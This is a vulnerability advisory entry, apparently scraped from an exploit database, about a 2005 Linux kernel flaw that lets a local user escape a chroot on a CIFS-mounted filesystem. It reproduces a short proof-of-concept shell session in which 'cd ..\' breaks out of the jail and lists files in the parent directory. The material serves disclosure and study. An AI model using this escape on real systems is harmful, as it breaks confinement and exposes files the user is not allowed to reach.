Linux Kernel Chroot Restriction Bypass Vulnerability

vendor:

Linux Kernel

by:

SecurityFocus

7.2

CVSS

HIGH

Bypass Restriction

287

CWE

Product Name: Linux Kernel

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2005

Linux Kernel Chroot Restriction Bypass Vulnerability

The Linux Kernel is prone to a vulnerability that allows attackers to bypass a security restriction. This issue is due to a failure in the kernel to properly sanitize user-supplied data. The problem affects chroot inside of an SMB-mounted filesystem ('cifs'). A local attacker who is bounded by the chroot can exploit this issue to bypass the chroot restriction and gain unauthorized access to the filesystem.

Mitigation:

Ensure that user-supplied data is properly sanitized before being used.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/17742/info

The Linux Kernel is prone to a vulnerability that allows attackers to bypass a security restriction. This issue is due to a failure in the kernel to properly sanitize user-supplied data.

The problem affects chroot inside of an SMB-mounted filesystem ('cifs'). A local attacker who is bounded by the chroot can exploit this issue to bypass the chroot restriction and gain unauthorized access to the filesystem.

root@server me]# pwd
/path/to/my/dir
[root@server me]# ls
bin chroot etc lib
[root@server me]# chroot .
bash-2.05a# pwd
/
bash-2.05a# ls
bin chroot etc lib
bash-2.05a# cd ..\bash-2.05a# pwd
/..bash-2.05a# ls
<list of files from parent>